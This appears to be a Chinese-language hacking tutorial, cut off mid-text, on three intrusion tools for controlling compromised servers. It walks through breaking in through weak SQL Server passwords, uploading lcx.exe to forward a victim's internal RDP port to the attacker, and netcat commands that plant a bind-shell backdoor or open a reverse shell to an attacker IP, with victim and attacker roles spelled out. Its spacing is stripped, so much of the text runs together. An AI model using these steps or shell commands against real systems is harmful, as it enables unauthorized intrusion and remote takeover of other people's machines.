三个入侵的必备小工具-lcx.exe、nc.exe、sc.exe

三个入侵的必备小工具-lcx.exe、nc.exe、sc.exelcx.exe的使用方法以前抓肉鸡都是通过1433弱口令,然后..但是发现很多服务器开了1433,3389,但是终端是连不上的,因为服务器本身是在内网,只对外开放了1433端口,幸好有lcx.exe这个东西,用sqltools.exe传倒服务器上...lcx.exe是个端口转发工具,相当于把肉鸡A上的3389端口转发到B机上,当然这个B机必须有外网IP.这样链接B机的3389度端口就相当于链接A机的3389.用法:如在本机B上监听-listen513389，在肉鸡A上运行-slave本机ip51肉鸡ip3389那么在本地连127.0.0.1就可以连肉鸡的3389.第二条是本机转向。例:现在有一个ip为201.1.1.1的1433弱.用端口扫描只发现开放了1433端口.用sqltools链接,dir看一下C:\DIRC:\2004/09/1710:32DIRautoAK2005/02/2117:0812,541avgun.log。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。日语,显示不正常.呵呵.netstat-an查看开放端口TCP0.0.0.0:33760.0.0.0:0LISTENINGTCP0.0.0.0:33890.0.0.0:0LISTENINGTCP0.0.0.0:37910.0.0.0:0LISTENINGTCP0.0.0.0:38770.0.0.0:0LISTENING终端已开.看下IPipconfigC:\ipconfigWindows2000IPConfigurationEthernetadapterConnection-specificDNSSuffix.:IPAddress............:192.168.1.24SubnetMask...........:255.255.255.0DefaultGateway.........:192.168.1.1192这样的是内网了...现在可以用lcx.exe搞定了...上传lcx.exe到肉鸡...C:\dirlcx.exeC:\WINNT\system322006/04/0213:4032,768lcx.exe首先在自己机子的cmd下运行lcx.exe-listen513389意思是监听51端口并转发到3389端口显示如下[+]Listeningport51......[+]ListenOK![+]Listeningport3389......[+]ListenOK![+]WaitingforClientonport:51......然后在肉鸡上运行lcx.exe-slave你的IP51201.1.1.13389201.1.1.1是我举例用的肉鸡IP.换成你的..运行以后本机监听端口就会收到信息.[+]Listeningport51......[+]ListenOK![+]Listeningport3389......[+]ListenOK![+]WaitingforClientonport:51......[+]AcceptaClientonport55from201.1.1.1......[+]WaitinganotherClientonport:3389....好了.现在在自己机子上链接127.0.0.1或者输你自己IP.发现进去的不是自己机子,(或者自己机子根本连不上),而是肉鸡A了!优点,搞定内网肉鸡.缺点,有点麻烦,而且每次都要通过sqltools先进行端口转发.当然也可以用反弹木马控制肉鸡了...nc.exe的使用方法1.Netcat1.10forNT-nc11nt.zip,原始英文信息2.Netcat1.10forNT帮助信息3.Netcat1.10常用的命令格式4.管理肉鸡,更改肉鸡设置5.下载连接######################################################################1.Netcat1.10forNT-nc11nt.zip######################################################################BasicFeatures*Outboundorinboundconnections,TCPorUDP,toorfromanyports*FullDNSforward/reversechecking,withappropriatewarnings*Abilitytouseanylocalsourceport*Abilitytouseanylocally-configurednetworksourceaddress*Built-inport-scanningcapabilities,withrandomizer*Canreadcommandlineargumentsfromstandardinputb*Slow-sendmode,onelineeveryNseconds*Hexdumpoftransmittedandreceiveddata*Abilitytoletanotherprogramserviceestablishedconnections*Telnet-optionsresponderNewforNT*Abilitytoruninthebackgroundwithoutaconsolewindow*Abilitytorestartasasingle-threadedservertohandleanewconnection________________________________________________________________________Someofthefeaturesofnetcatare:Outboundorinboundconnections,TCPorUDP,toorfromanyportsFullDNSforward/reversechecking,withappropriatewarningsAbilitytouseanylocalsourceportAbilitytouseanylocally-configurednetworksourceaddressBuilt-inport-scanningcapabilities,withrandomizerBuilt-inloosesource-routingcapabilityCanreadcommandlineargumentsfromstandardinputSlow-sendmode,onelineeveryNsecondsOptionalabilitytoletanotherprogramserviceinboundconnectionsSomeofthepotentialusesofnetcat:ScriptbackendsScanningportsandinventoryingservicesBackuphandlersFiletransfersServertestingandsimulationFirewalltestingProxygatewayingNetworkperformancetestingAddressspoofingtestsProtectingXservers1001otherusesyou`lllikelycomeupwithNetcat+Encryption=Cryptcat对比win2000微软的telnet.exe和微软的tlntsvr.exe服务,连接的时候就可以看出来了.1.1NC.EXE是一个非标准的telnet客户端程序,1.2还有一个putty.exe客户端程序,提供四种连接模式-raw-telnet-rlogin-ssh.######################################################################2.Netcat1.10forNT帮助信息######################################################################C:\WINDOWS\Desktopnc-h[v1.10NT]connecttosomewhere:nc[-options]hostnameport[s][ports]...listenforinbound:nc-l-pport[options][hostname][port]options:-ddetachfromconsole,backgroundmode(后台模式)-eproginboundprogramtoexec[dangerous!!]-ggatewaysource-routinghoppoint[s],upto8-Gnumsource-routingpointer:4,8,12,...-hthiscruft(本帮助信息)-isecsdelayintervalforlinessent,portsscanned(延迟时间)-llistenmode,forinboundconnects(监听模式,等待连接)-Llistenharder,re-listenonsocketclose(连接关闭后,仍然继续监听)-nnumeric-onlyIPaddresses,noDNS(ip数字模式,非dns解析)-ofilehexdumpoftraffic(十六进制模式输出文件,三段)-pportlocalportnumber(本地端口)-rrandomizelocalandremoteports(随机本地远程端口)-saddrlocalsourceaddress(本地源地址)-tanswerTELNETnegotiation-uUDPmode-vverbose[usetwicetobemoreverbose](-vv更多信息)-wsecstimeoutforconnectsandfinalnetreads-zzero-I/Omode[usedforscanning](扫描模式,-vv)portnumberscanbeindividualorranges:m-n[inclusive]######################################################################3.Netcat1.10常用的命令格式######################################################################下面引用《沉睡不醒10月15日凌晨》的文章的部分。3.1.端口的刺探：nc-vvipportRIVER[192.168.0.198]19190(?)open//显示是否开放open3.2.扫描器nc-vv-w5ipport-portportnc-vv-zipport-portport这样扫描会留下大量的痕迹，系统管理员会额外小心3.3.后门victimmachine://受害者的机器nc-l-pport-ecmd.exe//win2000nc-l-pport-e/bin/sh//unix,linuxattackermachine://攻击者的机器.ncip-pport//连接victim_IP,然后得到一个shell。3.4.反向连接attackermachine://一般是sql2.exe,远程溢出,webdavx3.exe攻击.//或者wollf的反向连接.nc-vv-l-pportvictimmachine:nc-ecmd.exeattackerip-pportnc-e/bin/shattackerip-pport或者：attackermachine:nc-vv-l-pport1/*用于输入*/nc-vv-l-pp